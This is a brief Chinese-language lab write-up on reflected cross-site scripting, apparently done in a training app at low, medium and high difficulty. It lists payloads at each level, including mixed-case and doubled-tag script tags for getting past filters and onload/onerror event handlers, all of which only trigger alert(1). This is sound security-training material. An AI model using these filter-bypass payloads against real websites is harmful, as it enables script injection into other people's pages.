XSS(跨站脚本攻击):
(实验基础:有php语言和html语言基础)
- XSS分类:
反射型XSS--->XSS(reflected)
存储型XSS---->XSS(stored)
- 实验原理:
利用javascript脚本实行跨站攻击
- 实验过程:
XSS(reflected)
1、low
构造恶意脚本:<script>alert(1)</script>
2、Medium
用之前的脚本攻击发现没用,查看php源码:
发现输入被进行了限制但并未进行大小写忽略,所以可用大小写绕过
构造恶意脚本:<Script>alert(1)</script>
也可用双写绕过,构造恶意脚本:<scr<script>ipt>alert(1)</script>
3、high
用之前两次构造的恶意脚本攻击发现都没用,此时再次查看php源码
发现输入被进行了限制且大小写忽略,所以可用标签绕过
构造恶意脚本攻击:<body οnlοad=alert(1)> ---------->onload 事件会在页面或图像加载完成后立即发生。onload 通常用于 <body> 元素,在页面完全载入后(包括图片、css文件等等。)执行脚本代码。
/ <img src=1 οnerrοr=alert(1)>------------>图片加载不了时执行onerror对应的内容